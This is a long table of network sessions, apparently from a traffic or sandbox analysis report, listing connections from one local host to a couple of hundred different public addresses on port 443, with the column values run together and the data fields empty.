                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20412192.168.2.1447028188.111.29.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20413192.168.2.144358083.81.223.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20414192.168.2.14446948.36.206.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20415192.168.2.144898043.154.175.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20416192.168.2.146080653.249.112.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20417192.168.2.145900475.132.84.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20418192.168.2.145884058.93.194.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20419192.168.2.1449730107.126.121.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20420192.168.2.14608942.102.53.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20421192.168.2.1447468149.13.154.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20422192.168.2.143281039.124.209.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20423192.168.2.1444702196.45.98.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20424192.168.2.144206627.82.252.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20425192.168.2.1434680196.11.72.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20426192.168.2.1456744153.80.86.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20427192.168.2.1440020210.231.180.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20428192.168.2.1446232221.194.162.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20429192.168.2.1451418124.187.11.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20430192.168.2.145478850.22.104.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20431192.168.2.1437610206.100.146.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20432192.168.2.1446624123.139.221.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20433192.168.2.144229824.71.234.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20434192.168.2.144129648.47.28.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20435192.168.2.1444586128.51.56.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20436192.168.2.1449094190.74.57.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20437192.168.2.1452966119.13.51.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20438192.168.2.1443724122.22.79.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20439192.168.2.143296253.208.121.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20440192.168.2.1444564155.52.117.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20441192.168.2.144292650.134.2.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20442192.168.2.144544465.83.1.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20443192.168.2.143760293.229.126.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20444192.168.2.1450216149.206.254.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20445192.168.2.146047670.127.51.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20446192.168.2.1434678117.185.98.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20447192.168.2.1459366158.71.94.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20448192.168.2.1451674163.88.77.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20449192.168.2.1445582120.195.222.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20450192.168.2.145725838.96.115.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20451192.168.2.1449240202.180.111.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20452192.168.2.1459246104.192.38.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20453192.168.2.1440888112.3.181.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20454192.168.2.146014835.59.202.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20455192.168.2.145387671.124.39.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20456192.168.2.143747685.221.250.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20457192.168.2.1438226151.129.139.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20458192.168.2.145718280.85.195.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20459192.168.2.1446086186.249.64.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20460192.168.2.145293419.88.164.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20461192.168.2.145455063.62.74.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20462192.168.2.143667058.150.2.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20463192.168.2.145175897.221.80.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20464192.168.2.1440200147.129.187.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20465192.168.2.145740497.35.252.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20466192.168.2.1435484174.138.176.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20467192.168.2.1437770137.58.200.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20468192.168.2.1455642141.180.191.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20469192.168.2.1454228137.213.169.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20470192.168.2.143395270.211.141.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20471192.168.2.1447946136.13.46.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20472192.168.2.145567492.142.218.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20473192.168.2.144807466.211.121.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20474192.168.2.14510321.219.223.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20475192.168.2.1459444154.101.182.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20476192.168.2.144111098.25.83.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20477192.168.2.1447140165.117.226.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20478192.168.2.145882447.178.245.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20479192.168.2.1442692155.155.218.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20480192.168.2.145041884.30.135.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20481192.168.2.1459294204.50.130.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20482192.168.2.1459800152.109.149.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20483192.168.2.1433144213.191.201.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20484192.168.2.14402782.74.80.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20485192.168.2.1457986171.162.250.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20486192.168.2.1441166153.225.172.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20487192.168.2.1435344218.187.18.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20488192.168.2.1446814108.49.220.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20489192.168.2.145939487.83.135.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20490192.168.2.144557668.94.219.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20491192.168.2.1437884218.118.219.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20492192.168.2.144091823.249.190.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20493192.168.2.143872683.183.54.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20494192.168.2.144556254.197.202.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20495192.168.2.144839266.153.213.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20496192.168.2.1434376146.39.173.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20497192.168.2.1457332133.85.49.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20498192.168.2.1458588155.134.204.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20499192.168.2.1455394112.137.27.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20500192.168.2.1435020168.7.93.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20501192.168.2.1449246191.197.119.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20502192.168.2.1453262143.22.7.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20503192.168.2.1454544220.184.122.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20504192.168.2.1452318108.182.53.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20505192.168.2.145713286.211.150.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20506192.168.2.1448584179.235.54.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20507192.168.2.1454798110.74.47.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20508192.168.2.1445916211.163.222.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20509192.168.2.1444810139.148.159.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20510192.168.2.1447320158.141.112.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20511192.168.2.145181688.116.226.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20512192.168.2.1446142217.122.216.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20513192.168.2.1458040119.80.61.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20514192.168.2.1457474202.8.73.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20515192.168.2.1450650164.92.63.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20516192.168.2.1439722123.188.95.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20517192.168.2.1441726112.243.180.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20518192.168.2.145530676.176.195.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20519192.168.2.145180672.73.254.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20520192.168.2.143337886.67.183.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20521192.168.2.1445246174.252.47.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20522192.168.2.145066038.52.4.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20523192.168.2.143845881.73.167.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20524192.168.2.1448252206.163.165.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20525192.168.2.144372475.56.0.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20526192.168.2.1455274173.129.188.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20527192.168.2.144289475.64.195.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20528192.168.2.144542842.188.170.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20529192.168.2.144517061.20.198.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20530192.168.2.144586649.23.31.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20531192.168.2.143555419.153.141.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20532192.168.2.143450243.100.7.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20533192.168.2.143498662.218.235.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20534192.168.2.1457130217.161.157.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20535192.168.2.1443296175.114.128.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20536192.168.2.1459258220.239.22.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20537192.168.2.143492832.149.29.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20538192.168.2.1448638200.26.228.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20539192.168.2.1435180133.145.158.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20540192.168.2.144773059.201.23.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20541192.168.2.1447130217.199.209.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20542192.168.2.1457840165.175.191.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20543192.168.2.1448060216.24.203.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20544192.168.2.1454676173.212.21.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20545192.168.2.1439542170.218.164.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20546192.168.2.1457806118.38.175.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20547192.168.2.145152087.72.63.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20548192.168.2.1449124107.67.4.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20549192.168.2.1459336108.28.218.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20550192.168.2.144577478.93.234.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20551192.168.2.1448158176.70.81.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20552192.168.2.1451396118.163.11.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20553192.168.2.1434506211.144.227.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20554192.168.2.145339883.137.39.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20555192.168.2.1444430137.109.244.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20556192.168.2.1448854106.224.107.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20557192.168.2.14557124.185.32.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20558192.168.2.145918874.243.146.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20559192.168.2.14456022.34.168.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20560192.168.2.145532487.158.10.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20561192.168.2.144895275.22.237.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20562192.168.2.1443616198.55.249.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20563192.168.2.145936499.251.183.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20564192.168.2.1440550186.86.131.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20565192.168.2.143958094.255.178.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20566192.168.2.144094037.95.173.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20567192.168.2.145317071.176.64.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20568192.168.2.1446598102.2.115.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20569192.168.2.145127251.66.196.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20570192.168.2.1434062173.4.22.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20571192.168.2.1434296108.36.125.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20572192.168.2.144691245.27.138.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20573192.168.2.1438174206.187.22.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20574192.168.2.1444238169.186.207.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20575192.168.2.144380648.14.244.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20576192.168.2.144902417.235.140.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20577192.168.2.145264058.92.88.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20578192.168.2.144287677.167.60.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20579192.168.2.144535645.227.150.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20580192.168.2.1450972170.212.215.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20581192.168.2.144208817.9.181.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20582192.168.2.144838844.112.123.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20583192.168.2.1450808200.153.203.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20584192.168.2.1442054183.238.50.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20585192.168.2.1434618112.46.119.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20586192.168.2.145944661.46.192.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20587192.168.2.1455136101.124.243.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20588192.168.2.143809627.79.189.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20589192.168.2.1452510101.232.229.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20590192.168.2.1460192210.205.103.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20591192.168.2.1440672186.59.126.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20592192.168.2.1457696100.52.102.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20593192.168.2.144023624.206.140.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20594192.168.2.1460988167.208.119.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20595192.168.2.144201888.192.202.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20596192.168.2.144428669.165.140.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20597192.168.2.1455950132.89.43.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20598192.168.2.1448072111.209.39.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20599192.168.2.143987636.31.78.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20600192.168.2.145556677.2.74.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20601192.168.2.1439148143.242.46.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20602192.168.2.1446446185.64.198.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20603192.168.2.1452280128.37.54.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20604192.168.2.1460032161.215.136.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20605192.168.2.143754252.104.80.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20606192.168.2.143582032.227.98.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20607192.168.2.1439488186.211.118.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20608192.168.2.1449592193.51.100.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20609192.168.2.1460786136.180.221.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20610192.168.2.1444694104.223.128.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20611192.168.2.1439004219.37.161.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20612192.168.2.143552635.87.5.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20613192.168.2.145868489.142.192.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20614192.168.2.1441340143.173.39.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20615192.168.2.144838623.233.141.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20616192.168.2.1433594201.245.57.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20617192.168.2.1447610117.8.169.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20618192.168.2.1446462220.150.59.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20619192.168.2.146092860.145.82.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20620192.168.2.144833470.111.17.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20621192.168.2.1444594190.246.253.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20622192.168.2.145826823.170.181.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20623192.168.2.145856653.141.131.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20624192.168.2.1436660180.19.245.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20625192.168.2.143452034.227.153.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20626192.168.2.145887845.196.30.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20627192.168.2.1450204169.239.57.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20628192.168.2.143650672.243.46.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20629192.168.2.146031865.242.122.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20630192.168.2.145979440.201.106.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20631192.168.2.1436336150.253.96.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20632192.168.2.1459476168.157.152.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20633192.168.2.143896297.39.127.126443
